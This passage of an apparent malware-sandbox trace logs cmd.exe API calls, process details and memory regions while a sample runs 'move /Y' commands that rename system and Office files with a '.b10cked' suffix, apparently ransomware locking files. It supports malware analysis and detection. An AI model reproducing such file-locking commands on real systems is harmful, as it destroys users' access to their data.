"c:\\users\\eebsym5\\desktop")) returned 0x11 [0152.132] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x24f47c | out: lpFindFileData=0x24f47c) returned 0x420008 [0152.132] FindClose (in: hFindFile=0x420008 | out: hFindFile=0x420008) returned 1 [0152.132] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x24f47c | out: lpFindFileData=0x24f47c) returned 0x420008 [0152.132] FindClose (in: hFindFile=0x420008 | out: hFindFile=0x420008) returned 1 [0152.132] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x24f47c | out: lpFindFileData=0x24f47c) returned 0x420008 [0152.133] FindClose (in: hFindFile=0x420008 | out: hFindFile=0x420008) returned 1 [0152.133] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0152.133] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0152.133] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0152.133] GetEnvironmentStringsW () returned 0x422ae8* [0152.133] FreeEnvironmentStringsW (penv=0x422ae8) returned 1 [0152.133] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0152.134] GetConsoleOutputCP () returned 0x1b5 [0152.134] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0152.134] GetUserDefaultLCID () returned 0x409 [0152.134] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0152.134] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x24f840, cchData=128 | out: lpLCData="0") returned 2 [0152.134] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x24f840, cchData=128 | out: lpLCData="0") returned 2 [0152.134] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x24f840, cchData=128 | out: lpLCData="1") returned 2 [0152.134] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0152.134] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0152.134] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0152.135] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0152.135] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0152.135] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0152.135] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0152.135] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0152.135] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0152.138] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0152.138] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0152.139] GetConsoleTitleW (in: lpConsoleTitle=0x4108d8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0152.139] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0152.139] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0152.139] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0152.139] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0152.140] _wcsicmp (_String1="move", _String2=")") returned 68 [0152.140] _wcsicmp (_String1="FOR", _String2="move") returned -7 [0152.140] _wcsicmp (_String1="FOR/?", _String2="move") returned -7 [0152.140] _wcsicmp (_String1="IF", _String2="move") returned -4 [0152.140] _wcsicmp (_String1="IF/?", _String2="move") returned -4 [0152.140] _wcsicmp (_String1="REM", _String2="move") returned 5 [0152.140] _wcsicmp (_String1="REM/?", _String2="move") returned 5 [0152.146] GetConsoleTitleW (in: lpConsoleTitle=0x24f538, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0152.146] _wcsicmp (_String1="move", _String2="DIR") returned 9 [0152.146] _wcsicmp (_String1="move", _String2="ERASE") returned 8 [0152.146] _wcsicmp (_String1="move", _String2="DEL") returned 9 [0152.146] _wcsicmp (_String1="move", _String2="TYPE") returned -7 [0152.147] _wcsicmp (_String1="move", _String2="COPY") returned 10 [0152.147] _wcsicmp (_String1="move", _String2="CD") returned 10 [0152.147] _wcsicmp (_String1="move", _String2="CHDIR") returned 10 [0152.147] _wcsicmp (_String1="move", _String2="RENAME") returned -5 [0152.147] _wcsicmp (_String1="move", _String2="REN") returned -5 [0152.147] _wcsicmp (_String1="move", _String2="ECHO") returned 8 [0152.147] _wcsicmp (_String1="move", _String2="SET") returned -6 [0152.147] _wcsicmp (_String1="move", _String2="PAUSE") returned -3 [0152.147] _wcsicmp (_String1="move", _String2="DATE") returned 9 [0152.147] _wcsicmp (_String1="move", _String2="TIME") returned -7 [0152.147] _wcsicmp (_String1="move", _String2="PROMPT") returned -3 [0152.147] _wcsicmp (_String1="move", _String2="MD") returned 11 [0152.147] _wcsicmp (_String1="move", _String2="MKDIR") returned 4 [0152.147] _wcsicmp (_String1="move", _String2="RD") returned -5 [0152.147] _wcsicmp (_String1="move", _String2="RMDIR") returned -5 [0152.147] _wcsicmp (_String1="move", _String2="PATH") returned -3 [0152.147] _wcsicmp (_String1="move", _String2="GOTO") returned 6 [0152.147] _wcsicmp (_String1="move", _String2="SHIFT") returned -6 [0152.147] _wcsicmp (_String1="move", _String2="CLS") returned 10 [0152.147] _wcsicmp (_String1="move", _String2="CALL") returned 10 [0152.147] _wcsicmp (_String1="move", _String2="VERIFY") returned -9 [0152.147] _wcsicmp (_String1="move", _String2="VER") returned -9 [0152.147] _wcsicmp (_String1="move", _String2="VOL") returned -9 [0152.147] _wcsicmp (_String1="move", _String2="EXIT") returned 8 [0152.147] _wcsicmp (_String1="move", _String2="SETLOCAL") returned -6 [0152.147] _wcsicmp (_String1="move", _String2="ENDLOCAL") returned 8 [0152.147] _wcsicmp (_String1="move", _String2="TITLE") returned -7 [0152.147] _wcsicmp (_String1="move", _String2="START") returned -6 [0152.147] _wcsicmp (_String1="move", _String2="DPATH") returned 9 [0152.147] _wcsicmp (_String1="move", _String2="KEYS") returned 2 [0152.147] _wcsicmp (_String1="move", _String2="MOVE") returned 0 [0152.149] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0152.149] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0152.149] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x24f2f4, nVolumeNameSize=0x104, lpVolumeSerialNumber=0x24f2ec, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x24f2ec*=0x90c08a66, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0152.150] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0152.150] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0152.150] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0152.150] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0152.150] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0152.150] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0152.150] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0152.150] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0152.150] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0152.150] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0152.150] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0152.150] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0152.150] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0152.150] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0152.150] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0152.150] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0152.150] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0152.150] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0152.150] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0152.150] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0152.150] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0152.150] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0152.150] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0152.150] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0152.150] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0152.150] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0152.150] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0152.150] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0152.150] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0152.150] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0152.150] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0152.150] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0152.151] _wcsnicmp (_String1="/Y", _String2="/Y", _MaxCount=0x2) returned 0 [0152.151] _wcsicmp (_String1="Pending.GRL", _String2=".") returned 66 [0152.151] _wcsicmp (_String1="Pending.GRL", _String2="..") returned 66 [0152.151] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\MF\\Pending.GRL" (normalized: "c:\\users\\alluse~1\\micros~1\\mf\\pending.grl")) returned 0x20 [0152.151] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x421d50 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0152.151] SetErrorMode (uMode=0x0) returned 0x0 [0152.151] SetErrorMode (uMode=0x1) returned 0x0 [0152.151] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\MF\\Pending.GRL", nBufferLength=0x104, lpBuffer=0x24ec7c, lpFilePart=0x24ec64 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\MF\\Pending.GRL", lpFilePart=0x24ec64*="Pending.GRL") returned 0x29 [0152.151] SetErrorMode (uMode=0x0) returned 0x1 [0152.151] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\MF" (normalized: "c:\\users\\alluse~1\\micros~1\\mf")) returned 0x2012 [0152.152] _wcsicmp (_String1="Pending.GRL", _String2=".") returned 66 [0152.152] _wcsicmp (_String1="Pending.GRL", _String2="..") returned 66 [0152.152] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\MF\\Pending.GRL" (normalized: "c:\\users\\alluse~1\\micros~1\\mf\\pending.grl")) returned 0x20 [0152.152] SetErrorMode (uMode=0x0) returned 0x0 [0152.152] SetErrorMode (uMode=0x1) returned 0x0 [0152.152] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\MF\\Pending.GRL", nBufferLength=0x104, lpBuffer=0x24f0f8, lpFilePart=0x24ee90 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\MF\\Pending.GRL", lpFilePart=0x24ee90*="Pending.GRL") returned 0x29 [0152.152] SetErrorMode (uMode=0x0) returned 0x1 [0152.152] SetErrorMode (uMode=0x0) returned 0x0 [0152.152] SetErrorMode (uMode=0x1) returned 0x0 [0152.152] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\MF\\Pending.GRL.b10cked", nBufferLength=0x104, lpBuffer=0x24f300, lpFilePart=0x24ee90 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\MF\\Pending.GRL.b10cked", lpFilePart=0x24ee90*="Pending.GRL.b10cked") returned 0x31 [0152.152] SetErrorMode (uMode=0x0) returned 0x1 [0152.152] SetLastError (dwErrCode=0x0) [0152.152] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\MF\\Pending.GRL.b10cked" (normalized: "c:\\users\\alluse~1\\micros~1\\mf\\pending.grl.b10cked")) returned 0xffffffff [0152.152] GetLastError () returned 0x2 [0152.152] FindFirstFileExW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\MF\\Pending.GRL", fInfoLevelId=0x1, lpFindFileData=0x24e80c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x24e80c) returned 0x410f20 [0152.153] FindNextFileW (in: hFindFile=0x410f20, lpFindFileData=0x24e80c | out: lpFindFileData=0x24e80c) returned 0 [0152.153] GetLastError () returned 0x12 [0152.153] FindClose (in: hFindFile=0x410f20 | out: hFindFile=0x410f20) returned 1 [0152.154] FindFirstFileExW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\MF\\Pending.GRL", fInfoLevelId=0x1, lpFindFileData=0x421af0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x421af0) returned 0x410f20 [0152.155] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\MF\\Pending.GRL.b10cked", nBufferLength=0x104, lpBuffer=0x24eaa4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\MF\\Pending.GRL.b10cked", lpFilePart=0x0) returned 0x31 [0152.155] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\MF\\Pending.GRL", nBufferLength=0x104, lpBuffer=0x24eaa4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\MF\\Pending.GRL", lpFilePart=0x0) returned 0x29 [0152.155] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\MF\\Pending.GRL" (normalized: "c:\\users\\alluse~1\\micros~1\\mf\\pending.grl")) returned 0x20 [0152.155] MoveFileExW (lpExistingFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\MF\\Pending.GRL" (normalized: "c:\\users\\alluse~1\\micros~1\\mf\\pending.grl"), lpNewFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\MF\\Pending.GRL.b10cked" (normalized: "c:\\users\\alluse~1\\micros~1\\mf\\pending.grl.b10cked"), dwFlags=0x3) returned 1 [0152.155] FindClose (in: hFindFile=0x410f20 | out: hFindFile=0x410f20) returned 1 [0152.155] _vsnwprintf (in: _Buffer=0x4a9e5040, _BufferCount=0x103, _Format="%9d", _ArgList=0x24ea58 | out: _Buffer=" 1") returned 9 [0152.155] _get_osfhandle (_FileHandle=1) returned 0x7 [0152.155] GetFileType (hFile=0x7) returned 0x2 [0152.250] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0152.250] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x24e9e4 | out: lpMode=0x24e9e4) returned 1 [0152.250] _get_osfhandle (_FileHandle=1) returned 0x7 [0152.250] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x24ea18 | out: lpConsoleScreenBufferInfo=0x24ea18) returned 1 [0152.250] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x0 | out: lpBuffer="%1 file(s) moved.\r\n") returned 0x13 [0152.251] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x24ea58 | out: lpBuffer=" 1 file(s) moved.\r\n") returned 0x1a [0152.251] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9f4640*, nNumberOfCharsToWrite=0x1a, lpNumberOfCharsWritten=0x24ea3c, lpReserved=0x0 | out: lpBuffer=0x4a9f4640*, lpNumberOfCharsWritten=0x24ea3c*=0x1a) returned 1 [0152.251] _get_osfhandle (_FileHandle=1) returned 0x7 [0152.251] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0152.251] _get_osfhandle (_FileHandle=1) returned 0x7 [0152.251] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0152.251] _get_osfhandle (_FileHandle=0) returned 0x3 [0152.251] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0152.252] SetConsoleInputExeNameW () returned 0x1 [0152.252] GetConsoleOutputCP () returned 0x1b5 [0152.252] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0152.252] SetThreadUILanguage (LangId=0x0) returned 0x409 [0152.252] exit (_Code=0) Process: id = "245" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16dc0" os_pid = "0xce4" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\ENVELO~1.TRX\" \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\ENVELOPR.DLL.trx_dll.b10cked\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 20185 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 20186 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 20187 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 20188 start_va = 0x50000 end_va = 0x14ffff entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 20189 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 20190 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 20191 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 20192 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 20193 start_va = 0x7ffd7000 end_va = 0x7ffd7fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd7000" filename = "" Region: id = 20194 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 20228 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 20229 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 20230 start_va = 0x150000 end_va = 0x1b6fff entry_point = 0x150000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 20231 start_va = 0x210000 end_va = 0x30ffff entry_point = 0x0 region_type = private name = "private_0x0000000000210000" filename = "" Region: id = 20232 start_va = 0x3d0000 end_va = 0x3dffff entry_point = 0x0 region_type = private name = "private_0x00000000003d0000" filename = "" Region: id = 20233 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 20234 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 20235 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 20236 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 20237 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 20238 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 20239 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 20240 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 20241 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 20242 start_va = 0x3e0000 end_va = 0x4a7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003e0000" filename = "" Region: id = 20243 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 20244 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 20245 start_va = 0x1c0000 end_va = 0x1c6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 20246 start_va = 0x1d0000 end_va = 0x1d1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 20247 start_va = 0x1e0000 end_va = 0x1e0fff entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 20248 start_va = 0x1f0000 end_va = 0x1f0fff entry_point = 0x0 region_type = private name = "private_0x00000000001f0000" filename = "" Region: id = 20249 start_va = 0x4b0000 end_va = 0x5b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004b0000" filename = "" Region: id = 20250 start_va = 0x5c0000 end_va = 0x11bffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005c0000" filename = "" Region: id = 20251 start_va = 0x11c0000 end_va = 0x1322fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000011c0000" filename = "" Thread: id = 308 os_tid = 0xa10 [0151.992] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x14fb44 | out: lpSystemTimeAsFileTime=0x14fb44*(dwLowDateTime=0x94872ae0, dwHighDateTime=0x1d440a9)) [0151.993] GetCurrentProcessId () returned 0xce4 [0151.993] GetCurrentThreadId () returned 0xa10 [0151.993] GetTickCount () returned 0x2eea2 [0151.993] QueryPerformanceCounter (in: lpPerformanceCount=0x14fb3c | out: lpPerformanceCount=0x14fb3c*=20878185212) returned 1 [0151.993] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0151.993] __set_app_type (_Type=0x1) [0151.993] __p__fmode () returned 0x76b331f4 [0151.994] __p__commode () returned 0x76b331fc [0151.994] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0151.994] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0151.994] GetCurrentThreadId () returned 0xa10 [0151.994] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xa10) returned 0x38 [0151.994] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0151.994] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0151.994] SetThreadUILanguage (LangId=0x0) returned 0x409 [0151.994] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0151.994] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x14fad4 | out: phkResult=0x14fad4*=0x0) returned 0x2 [0151.995] VirtualQuery (in: lpAddress=0x14fb0b, lpBuffer=0x14faa4, dwLength=0x1c | out: lpBuffer=0x14faa4*(BaseAddress=0x14f000, AllocationBase=0x50000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0151.995] VirtualQuery (in: lpAddress=0x50000, lpBuffer=0x14faa4, dwLength=0x1c | out: lpBuffer=0x14faa4*(BaseAddress=0x50000, AllocationBase=0x50000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0151.995] VirtualQuery (in: lpAddress=0x51000, lpBuffer=0x14faa4, dwLength=0x1c | out: lpBuffer=0x14faa4*(BaseAddress=0x51000, AllocationBase=0x50000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0151.995] VirtualQuery (in: lpAddress=0x53000, lpBuffer=0x14faa4, dwLength=0x1c | out: lpBuffer=0x14faa4*(BaseAddress=0x53000, AllocationBase=0x50000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0151.995] VirtualQuery (in: lpAddress=0x150000, lpBuffer=0x14faa4, dwLength=0x1c | out: lpBuffer=0x14faa4*(BaseAddress=0x150000, AllocationBase=0x150000, AllocationProtect=0x2, RegionSize=0x67000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0151.995] GetConsoleOutputCP () returned 0x1b5 [0151.995] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: 